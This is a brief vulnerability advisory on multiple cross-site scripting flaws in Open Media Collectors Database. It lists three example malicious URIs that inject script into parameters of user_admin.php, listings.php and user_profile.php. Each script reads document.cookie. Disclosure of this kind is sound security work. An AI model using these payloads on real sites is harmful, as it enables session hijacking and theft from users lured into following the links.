Open Media Collectors Database Multiple Cross Site Scripting Vulnerabilities

Open Media Collectors Database Multiple Cross Site Scripting Vulnerabilities

To exploit these issues, an attacker must entice an unsuspecting victim into following a malicious URI.

The following example URIs are available:

http://www.example.com/user_admin.php?op=edit&user_id=<img/src/onerror=alert(document.cookie)>

http://www.example.com/listings.php?search_list=y&linked_items=include&title_match=partial&title=<img/src/onerror=alert(document.cookie)>

http://www.example.com/user_profile.php?uid=[USERNAME]&subject=No+Subject&redirect_link=Back+to+Statistics&redirect_url=javascript:alert(document.cookie)